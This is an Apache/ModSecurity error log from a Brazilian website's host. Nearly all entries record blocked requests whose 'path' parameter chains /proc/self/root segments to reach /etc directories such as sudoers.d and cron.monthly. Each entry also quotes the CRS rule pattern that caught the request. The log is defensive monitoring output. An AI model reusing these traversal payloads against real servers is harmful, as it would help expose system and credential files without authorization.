https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:21.426595 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:35538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPteoXxyEfFpUF8f9BxQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:23.814918 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:35548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPtxCii7xarUs8iHYeggAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:26.242299 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:35562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPuta6ubjKNq_cu4aKYwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:28.564710 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:48772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPvAkwaGbbGflqUZAALAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:31.040495 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:48774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPv-oXxyEfFpUF8f9BzQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:33.519710 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:48784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPwRCii7xarUs8iHYehQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:36.458832 2026] [:error] [pid 8307:tid 140411733534464] [client 74.7.241.31:48786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPxL-FhjpZGs9ba8qgQwAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:40.348665 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:57426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPxvu8EFLIOrSqIpvckAAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:42.434728 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:57432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPyvXLqtnMIWvjpaJTzwAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:44.517791 2026] [core:alert] [pid 5816:tid 140411683178240] [client 57.141.18.0:38886] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 01:40:44.911408 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:57436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPzAkwaGbbGflqUZAAQAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:46.133781 2026] [proxy_fcgi:error] [pid 7235:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34668] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:40:47.270408 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.241.31:41436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPz_qxLDW4GITHUkSelgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:49.399770 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:41436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP0fqxLDW4GITHUkSemAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:51.291123 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:41622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP0wkwaGbbGflqUZAARQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:52.196156 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:41438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP1PqxLDW4GITHUkSemgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:54.576558 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:41450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP1vu8EFLIOrSqIpvcogAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:56.972370 2026] [:error] [pid 21563:tid 140411548894976] [client 74.7.241.31:41452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP2Epm7ZmxKZTM4bZ7qgAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:59.528258 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:35088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP29a6ubjKNq_cu4aKcwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:02.816355 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:35098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP3vqxLDW4GITHUkSeoQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:06.314654 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:35104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP4ta6ubjKNq_cu4aKdwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:09.057901 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35202] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:41:09.827722 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:60728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP5eoXxyEfFpUF8f9B2wAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:11.820364 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:60728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP5-oXxyEfFpUF8f9B3gAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:14.672511 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:60734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP6hCii7xarUs8iHYeoQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
